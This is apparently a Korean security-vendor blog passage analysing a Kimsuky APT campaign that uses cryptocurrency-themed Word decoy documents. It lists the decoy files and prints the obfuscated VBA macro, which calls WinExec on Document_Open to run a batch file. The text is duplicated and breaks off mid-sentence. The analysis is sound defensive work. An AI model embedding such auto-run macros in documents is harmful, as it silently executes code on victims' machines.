코인관련 내용의 워드문서를 이용한 APT 공격 (Kimsuky)
Contents
코인관련 내용의 워드문서를 이용한 APT 공격 (Kimsuky)
ASEC 분석팀은 3월 21일 Kimsuky 그룹이 코인관련 내용의 워드문서로 APT 공격을 수행중인 것을 확인하였다. 공격에 사용된 미끼 문서는 총 3건이 확인되었으며 매크로 제작자 및 동작방식은 지난 3월 14일에 ASEC 블로그에 게시한 내용(제목: 제품소개서로 위장한 악성 워드 문서)과 동일하다. 3건 모두 정상적으로 작성된 워드문서를 바탕으로 악의적 매크로 코드를 추가하여 배포한 것으로 추정되며, 내용은 모두 가상화폐와 관련되어있어 코인업체를 타겟으로 한 공격으로 추정된다. 문서를 수정한 사람은 Acer 이름으로 동일하며, 모두 3월 21일 오전에 수정되어 최근 공격에 이용될 가능성이 높아 각별한 주의가 요구된다.
- 주주물량관련.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 10:29)
- 자산부채현황.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 11:10)
- 제 3차 정기총회.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 11:03)
확보된 3개 문서 모두 동일한 매크로를 사용하였으며 지난 블로그에서 소개한 temp.doc 매크로 코드와 기능이 일치하였다.
- 기능 : “C:\Users\Public\Documents\no1.bat” 파일 실행
Private Declare PtrSafe Function NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp "C:\Users\Public\Documents\no1.bat", 0
End Sub
“no1.bat” 파일을 …
ASEC 분석팀은 3월 21일 Kimsuky 그룹이 코인관련 내용의 워드문서로 APT 공격을 수행중인 것을 확인하였다. 공격에 사용된 미끼 문서는 총 3건이 확인되었으며 매크로 제작자 및 동작방식은 지난 3월 14일에 ASEC 블로그에 게시한 내용(제목: 제품소개서로 위장한 악성 워드 문서)과 동일하다. 3건 모두 정상적으로 작성된 워드문서를 바탕으로 악의적 매크로 코드를 추가하여 배포한 것으로 추정되며, 내용은 모두 가상화폐와 관련되어있어 코인업체를 타겟으로 한 공격으로 추정된다. 문서를 수정한 사람은 Acer 이름으로 동일하며, 모두 3월 21일 오전에 수정되어 최근 공격에 이용될 가능성이 높아 각별한 주의가 요구된다.
- 주주물량관련.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 10:29)
- 자산부채현황.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 11:10)
- 제 3차 정기총회.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 11:03)
확보된 3개 문서 모두 동일한 매크로를 사용하였으며 지난 블로그에서 소개한 temp.doc 매크로 코드와 기능이 일치하였다.
- 기능 : “C:\Users\Public\Documents\no1.bat” 파일 실행
Private Declare PtrSafe Function NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp "C:\Users\Public\Documents\no1.bat", 0
End Sub
“no1.bat” 파일을 …